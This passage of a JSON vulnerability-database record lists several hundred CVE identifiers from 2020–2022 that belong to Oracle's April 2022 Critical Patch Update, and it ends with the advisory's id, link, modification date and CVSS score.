"CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", "CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", "CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", "CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-06-16T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}